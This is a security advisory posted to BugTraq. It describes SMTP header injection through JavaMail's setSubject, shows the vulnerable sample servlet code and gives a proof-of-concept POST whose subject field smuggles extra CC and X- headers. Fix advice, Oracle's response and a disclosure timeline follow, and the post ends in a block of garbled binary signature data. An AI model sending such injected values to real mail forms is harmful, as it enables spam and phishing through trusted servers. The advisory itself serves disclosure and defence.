BugTraq
JavaMail SMTP Header Injection via method setSubject [CSNC-2014-001] May 19 2014 01:30PM
Alexandre Herzog (alexandre herzog csnc ch)
#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product: JavaMail
# Vendor: Oracle
# CSNC ID: CSNC-2014-001
# CVD ID: <none>
# Subject: SMTP Header Injection via method setSubject
# Risk: Medium
# Effect: Remotely exploitable
# Author: Alexandre Herzog <alexandre.herzog (at) csnc (dot) ch [email concealed]>
# Date: 19.05.2014
#
#############################################################

Introduction:
-------------
The JavaMail API provides a platform-independent and
protocol-independent framework to build mail and messaging applications.
The JavaMail API is available as an optional package for use with the
Java SE platform and is also included in the Java EE platform.[1]

JavaMail does not check if the email subject contains a Carriage Return
(CR) or a Line Feed (LF) character on POST multipart requests. This
issue allows the injection of arbitrary SMTP headers in the generated
email. This flaw can be used for sending SPAM or other social
engineering attacks (e.g. abusing a trusted server to send HTML emails
with malicious content).

Affected:
---------
The following versions of JavaMail were tested and found vulnerable:
- 1.4.5 (included in the .war file used as demo from [2])
- 1.5.1 (latest version downloaded on 31.12.2013 from [3])

Technical Description
---------------------
The tests were performed using the .war file downloaded from [2]. That
code features an example on how to send a file per email using JSP and
a servlet. The relevant parts of this example are:
[...]
/**
* A utility class for sending e-mail message with attachment.
* @author www.codejava.net
*
*/
public class EmailUtility {

/**
* Sends an e-mail message from a SMTP host with a list of attached files.
*
*/
public static void sendEmailWithAttachment(String host, String port,
final String userName, final String password, String toAddress,
String subject, String message, List<File> attachedFiles)
throws AddressException, MessagingException {
// sets SMTP server properties
Properties properties = new Properties();
properties.put("mail.smtp.host", host);
properties.put("mail.smtp.port", port);
properties.put("mail.smtp.auth", "true");
properties.put("mail.smtp.starttls.enable", "true");
properties.put("mail.user", userName);
properties.put("mail.password", password);

// creates a new session with an authenticator
Authenticator auth = new Authenticator() {
public PasswordAuthentication getPasswordAuthentication() {
return new PasswordAuthentication(userName, password);
}
};
Session session = Session.getInstance(properties, auth);

// creates a new e-mail message
Message msg = new MimeMessage(session);

msg.setFrom(new InternetAddress(userName));
InternetAddress[] toAddresses = { new InternetAddress(toAddress) };
msg.setRecipients(Message.RecipientType.TO, toAddresses);
==> msg.setSubject(subject);
msg.setSentDate(new Date());
[...]

[...]
/**
* A servlet that takes message details from user and send it as a new e-mail
* through an SMTP server. The e-mail message may contain attachments which
* are the files uploaded from client.
*
* @author www.codejava.net
*
*/
@WebServlet("/SendMailAttachServlet")

// CSNC comment - this tag enables the processing of POST multipart requests
@MultipartConfig(fileSizeThreshold = 1024 * 1024 * 2, // 2MB
maxFileSize = 1024 * 1024 * 10, // 10MB
maxRequestSize = 1024 * 1024 * 50) // 50MB
public class SendMailAttachServlet extends HttpServlet {
private String host;
private String port;
private String user;
private String pass;

public void init() {
// reads SMTP server setting from web.xml file
ServletContext context = getServletContext();
host = context.getInitParameter("host");
port = context.getInitParameter("port");
user = context.getInitParameter("user");
pass = context.getInitParameter("pass");
}

/**
* handles form submission
*/
protected void doPost(HttpServletRequest request,
HttpServletResponse response) throws ServletException, IOException {

List<File> uploadedFiles = saveUploadedFiles(request);

String recipient = request.getParameter("recipient");
==> String subject = request.getParameter("subject");
String content = request.getParameter("content");

String resultMessage = "";

try {
==> EmailUtility.sendEmailWithAttachment(host, port, user, pass,
recipient, subject, content, uploadedFiles);

resultMessage = "The e-mail was sent successfully";
} catch (Exception ex) {

Below is a genuine request POST request for the example above, done
using "Content-Type: multipart" as it involves uploading a file:
POST /EmailAttachWebApp/SendMailAttachServlet HTTP/1.1
Host: localhost:8080
[...]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------205721274512326
Content-Length: 1785

-----------------------------205721274512326
Content-Disposition: form-data; name="recipient"

test@[redacted]
-----------------------------205721274512326
Content-Disposition: form-data; name="subject"

With javax.mail.1.5.1
-----------------------------205721274512326
Content-Disposition: form-data; name="content"

SMTP header injection test
-----------------------------205721274512326
Content-Disposition: form-data; name="file"; filename="NOTICE"
Content-Type: application/octet-stream

Apache Tomcat
Copyright 1999-2012 The Apache Software Foundation
[...]


"Content-Type: multipart" allows us to submit a string containing a CR
or LF without having to use HEX characters %0A and %0D nor \n and \r. In
the JavaMail case, we abuse this feature to inject additional SMTP
headers through the Subject parameter in the request:
POST /EmailAttachWebApp/SendMailAttachServlet HTTP/1.1
Host: localhost:8080
[...]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------205721274512326
Content-Length: 1839

-----------------------------205721274512326
Content-Disposition: form-data; name="recipient"

test@[redacted]
-----------------------------205721274512326
Content-Disposition: form-data; name="subject"

With javax.mail.1.5.1
==> CC: injected.header@[redacted]
==> X-other-header: foo bar
-----------------------------205721274512326
Content-Disposition: form-data; name="content"

SMTP header injection test
-----------------------------205721274512326
Content-Disposition: form-data; name="file"; filename="NOTICE"
Content-Type: application/octet-stream

Apache Tomcat
Copyright 1999-2012 The Apache Software Foundation
[...]

This email is sent successfully and is received by the recipient under
the following form, where the injected SMTP headers are clearly visible:
[...]
From: [redacted]@gmail.com
To: test@[redacted]
Message-ID: <52c2e778.01030e0a.7154.fffff0c2 (at) mx.google (dot) com [email concealed]>
Subject: With javax.mail.1.5.1
CC: injected.header@[redacted]
==> X-other-header: foo bar
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_Part_0_1681986934.1388504951836"
[...]

------=_Part_0_1681986934.1388504951836
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit

SMTP header injection test
------=_Part_0_1681986934.1388504951836
Content-Type: application/octet-stream; name=NOTICE
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename=NOTICE

Apache Tomcat
Copyright 1999-2012 The Apache Software Foundation
[...]

The same behavior can be observed when using JavaMail 1.4.5 (bundled by
default in the example .war [2]) instead of the latest 1.5.1 JavaMail
version.

Workaround / Fix:
-----------------
Ensure your application strictly follows the JavaMail API and ensures
the subject string does not contain any line breaks (as stated in some
parts of the API [4]). An alternative would be to fix the setSubject
method of JavaMail by either disallowing the usage of CR/LF characters
or appending a space after each CR/LF character to be RFC compliant (see
2.2.3 Long Header Fields of RFC 2822 [5]).

Oracle issued the following statement regarding this matter: "The
assessment from our engineering team is that this is not a bug in
JavaMail API. The application is responsible to perform some input
validation. In this particular case, the application is responsible for
ensuring that the subject string does not contain any line breaks. The
code demonstrated the issue is not an Oracle sample. Therefore, we are
closing the issue as not-a-bug."

Timeline:
---------
2014-05-19: Global publication of the advisory
2014-03-19: Advisory sent to Compass Security's customers
2014-02-19: Got confirmation from Oracle they agree our publication
schedule
2014-02-18: Informed Oracle that we plan to publish details of this
issue to our customer this week and to the general
public in a month
2014-02-05: Informed Oracle we consider publishing this information
2014-02-04: Response from Oracle: is not considered a bug
2014-01-23: Status report from Oracle mentioning the case being
"Under investigation / Being fixed in main codeline"
2014-01-01: Reception acknowledgement from Oracle
2014-01-01: Sending advisory and PoC to Oracle
2014-01-01: Isolation and reproduction of an issue discovered
previously by the author

References:
-----------
[1] http://www.oracle.com/technetwork/java/javamail/index.html
[2] http://www.codejava.net/java-ee/jsp/send-attachments-with-e-mail-using-j
sp-servlet-and-javamail
[3] https://java.net/projects/javamail/pages/Home
[4] https://javamail.java.net/nonav/docs/api/javax/mail/internet/MimeMessage
.html#setSubject(java.lang.String)
[5] http://www.ietf.org/rfc/rfc2822.txt

--
Alexandre Herzog, CTO, Compass Security Schweiz AG
Werkstrasse 20, 8645 Jona, Switzerland
Schauplatzgasse 39, 3011 Bern, Switzerland
http://www.csnc.ch/

0?n *?H?÷
 ?_0?[1 0 +0  *?H?÷
 ?+0?û0?ã }i>Y-sR⧭[³è30
 *?H?÷
0U1 0 UCH10U
 SwissSign AG1/0-U&SwissSign Personal Silver CA 2008 - G20
120820133715Z
150820133715Z0I10U Email Validated Only1(0&UEmail: alexandre.herzog (at) csnc (dot) ch0 [email concealed]?"0
 *?H?÷
?0?
?º?G?´Æ]ÿº?Ô­{R7?w9ú ®B6¯býÆ6%MæGWbSе¾"ìÇ/SèÕö6
bJa*ù¥'¬ÃVp·#<yù?vþWIît±ÒOÏsÐá
Ѿ«ÂmDï(Ä19?ùýf[
¥,´þªÝÚ8¥( äò?ÔÛ¥ÌÙUõvm«/|ލùÐ?ô]?¼au¿rÅ1???puíÓT|??eÿïgü4ZØÑ?GeD?í?4??]ú?¹YË?
]Ùh 2?£õ!7æÜ?ä Idô¾d=?ÿ¤â²q$R|oÿmÛï]ßEÍI?»ý}?£?Ò0?Î0Uÿ°0U%
 0
+0Uâͪö*WéÚÿÂ$Ò"?'Iu0U#0?ë5±Vm`Xôá"ÍF®Ð
e0ÿU÷0ô0G E C?Ahttp://crl.swisssign.net/EB35B1566D156058F4E122CD
1C461CAED00400650¨ ¥ ¢??ldap://directory.swisssign.net/CN=EB35B1566D
156058F4E122CD1C461CAED0040065%2CO=SwissSign%2CC=CH?certificateRevocatio
nList?base?objectClass=cRLDistributionPoint0dU ]0[0Y `?tY0L0J+>http://repository.swisssign.com/SwissSign-Silve
r-CP-CPS-R4.pdf0Ù+Ì0É0d+0?Xhttp://swisssign.net/cgi
-bin/authority/download/EB35B1566D156058F4E122CD1C461CAED00400650a+
0?Uhttp://silver-personal-g2.ocsp.swisssign.net/EB35B1566D156058F4E12
2CD1C461CAED00400650#U0alexandre.herzog (at) csnc (dot) ch0 [email concealed]
 *?H?÷
?eà?ÞÁU©þO¿ÇJ
à;.¬~"³²`??pÍ?{î?|YûÆ¢ýÓ?o¸òäÖ;`AW©º?C?S6?¡¤xïÞz}ñ¯9èa£luÆ@?^
?¾Þu¢~p¶É
*Þ©ìÙ?ÇÌQ?h·)Z`*?'R{Ý?PT0???í&°·¹?+ô?I¦3ËÇÍ¿jL cO$³\r\} EÀÃ@"ÁãUÎd9ø
²ZÍÜ2µf΍ã§8ÐA§?ÅúTã??ÊU à??æ??­??+P?(¥J@P}«??_*±¢?,8?Ôݐ¹+*y?Z0?g0?O  âV·S?kvX0
 *?H?÷
0G1 0 UCH10U
 SwissSign AG1!0USwissSign Silver CA - G20
080709111109Z
230709111109Z0U1 0 UCH10U
 SwissSign AG1/0-U&SwissSign Personal Silver CA 2008 - G20?"0
 *?H?÷
?0?
?÷óS^Im?å'!`¥v??¸!@Ï63¬*r?aÃkÞzIX=?Ø;ðA¿kV³=¿cº1~ârFh?
×?O É{©Ð9Ñ?Ö5ghvÁ_? ÍÏ:Ñ?
ÚòCò¤¢¬?u è÷4§¿¶æ9hfRG9)M´è*­a´¢1à?ÛäCñ+ÞÁ4Ël?îb'DØ1ñß<!ÌÀ¬h
ÓthÉJ?; §±e¤®.zÞzDo°þtÿ?õXé¦%ñÌ?"'ØË1Á/( qr÷ûNnz¬!?
Zfø¿åù?Ä?º3
??]®¡£?F0?B0Uÿ0Uÿ0ÿ0Uë5±Vm
`Xôá"ÍF®Ðe0U#0? ÍÁäA¶:[;ËE½Â?ú?X0ÿU÷0ô0G E C?Ahttp
://crl.swisssign.net/17A0CDC1E441B63A5B3BCB459DBD1CC298FA86580¨ ¥ ¢?
?ldap://directory.swisssign.net/CN=17A0CDC1E441B63A5B3BCB459DBD1CC298FA8
658%2CO=SwissSign%2CC=CH?certificateRevocationList?base?objectClass=cRLD
istributionPoint0dU ]0[0Y `?tY0L0J+>http://repository.swisssign.com/SwissSign-Silve
r-CP-CPS-R3.pdf0t+h0f0d+0?Xhttp://swisssign.net/cgi-bi
n/authority/download/17A0CDC1E441B63A5B3BCB459DBD1CC298FA86580
 *?H?÷
?.*vÚ?óLßd'á[-?ï¹U.Û¸ e1@°K½|±ÙØqSÎè5,?ºt?ÔW?ÀW??P%{à?Ô]¸Dxé3Aþá¿F?y}r¼8PÀhZ²ÓÞ]gÏi?ø
õ¬ ?ÔÝZ.j9#ïôïsZ6Ãé Gd79y×P²¬º?ê?äEF¾Í/9?
?ðU²&$Q³kÑ|i=XՁ5<hGWÆ³Ï*jE/?©N=Á9ÊëûÞJ?­¸a? ¸?#´vC?®?8^Ò8õ?Ù Õ.øÉ??§ ³Ò(]#lNfñ?c ÜbÄGâr¢àm~=]?E?h?¥ðõíÛ??Îé¦?Úßn5Ú`ö°G?4å¼`´ÀÀ(ôn<¹ú
I?:e8´µa??!ï??Åu(5«^R`/:ï1?¦{÷H p<µ×bË´BÃô¸Dq?$ü×î?!èªc?ÃÏ[òÒ?p'TÌî¡Ñ "?^Ð?C9ªRNgÚ2¼Z??Ú6«Szôwêü×èÞê?ÆnPDàÏ0Ê??¡ §ü¹èÅ-ósõTþ(א##)OI3y
?J^a?f]Ñ?o?.![eDÍvIò¥ƶ~?¢6£)¡x«$]ð
t

y?aHUÞF¹¹Ûª?0?½0?¥ OÔ/T»/K0
 *?H?÷
0G1 0 UCH10U
 SwissSign AG1!0USwissSign Silver CA - G20
061025083246Z
361025083246Z0G1 0 UCH10U
 SwissSign AG1!0USwissSign Silver CA - G20?"0
 *?H?÷
?0?
?Äñ?Óx1÷8ÉøÃ?C¼Ç÷¼7çNqºK¥s\n?®W®87C/=ÈÎhÁx®+ú,y?öè¹h¹UòD§9
ùü?ñ¢M'ùa{º·å¢¶ëa>ÐlÑæûú^í´? 5[¡?ËðI?þ?
>æÙ âO»Ü?7ü?é25"Ñ:N'?°?2Úa
GM`B®?Gè?ZPXé??¹]¡ÜÝ?J6g»Hä?¶7ëH:¯gèÊïj1?ÔÀ¶ù?q{gd¸¶?JB{e.0j õî?æòÍ?ìÙ¡Jìö²KåE?æmx?.??m6©Ä1d?? *ô5
xÉUÏA°Gé0??¾a¨?¹(z_8Ù©8°?sÁÃ;H*?!?¸Ì¨5Ã??³>¾¤?i:?xÙÉô?«V~[??9?¤
, 2?`³?À*¶ ~IòJùÕF/?£?§&¬»?<æ¼GÜsQñpd/ù´G0lDê)7??hf¼?8þ{9.ÓPðû^
`¶©¦ú'Añ?ròõ?tJÉgÄT®Hdß?Ñn°á??qéLØ¥÷GtÑQ??ó¢#@ sÛK¦çs?Á éÁY¬Fú
æ/øÏq?Fm¹Ä8yEHïÄ]×î?9"?²
XC÷q©H.ýêÖ£¬0©0Uÿ0Uÿ0ÿ0U ÍÁäA
¶:[;ËE½Â?ú?X0U#0? ÍÁäA¶:[;ËE½Â?ú?X0FU ?0=0; `?tY0.0,+ http://repository.swisssign.com/0
 *?H?÷
?sƁà'Ò-à?0â?AP,__ba©?ji tIÖ]?êARoX­PV jƽ(iX?Ü?5©:¼¥`?ØE?iÙ~»xrÁ*Ώ?pa¬ Í ¸9)V?2N?»=Ä*Ù×rîþQ¡"A±qc?°
b«^WßËÝu À]y?àPæÞ1þ?{p_¥Ø­ø¶oÓ`Ý@K"Å=­:z?G?y3º?Ü2i?nKðqþãgr ±¿
\?äú?"Ç?¹#??í%àÏe»õaïݲZA"Z¡?],è[Ém© xª`ÆVZ h¼iyÄ~?¿Åé$Q^ÔÕKSíÙ#Z6e£Á­A0óF?¯eµÕ±ä[xu?zmY©*{ÞÃ???IsxÈ=½Q5t
*Õñ~i*»;½%¸?Z=raf?î ÖMÔt jþ ü£UW?þJË®[Èò#1S8Ò-j??¹j÷^AtnÃ~¬)`??8ÊW
½0/Ç¥æA Ú®?? ¤elL ?º¸Ó¹À??0úå?kNgªÚbV>?fÒÄ6}§>ü?àÔ?彪óN£zjùbrã Oë?#ñ?»|ÜÜl?%²ò´cÒ*g??õÎêØ?jìä
»*Lë `9ÎÊbØ.n1? 0?0h0U1 0 UCH10U
 SwissSign AG1/0-U&SwissSign Personal Silver CA 2008 - G2}i>Y-sR⧭[³è30 + z0# *?H?÷
 1?SZ³Ï
5÷;Á#¾Õn¬0 *?H?÷
 1  *?H?÷
0 *?H?÷
 1
140519133051Z0 *?H?÷
 10 0
*?H?÷
0
 *?H?÷
? `V?°ÿÍ?ýgªFI¸<?uU?|¹Ààì½4M=²ht?ûº½??×¼ä°]4sÿ¶Ûd\*??®G¯:-
qÚ01iBq²?>VåÛ?y
:»󾍿EüxZ>6<õâäC:_l½
E?¹¦ÿC?_mß°Î+?¾êðù¼$e?9ͪUë£o?? 4^y/?öÒ±%óÈåß?|¨Åéu1Ë#lî|7S!¦
þíNP+vG?ÉF«õ¯óCq¤?Ã2BgíO2 -¦7öí:?Ãû±×WÿÀ>?èf?Kú¡Ñ ,å?u&wÒ??¥s!¥äZ

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus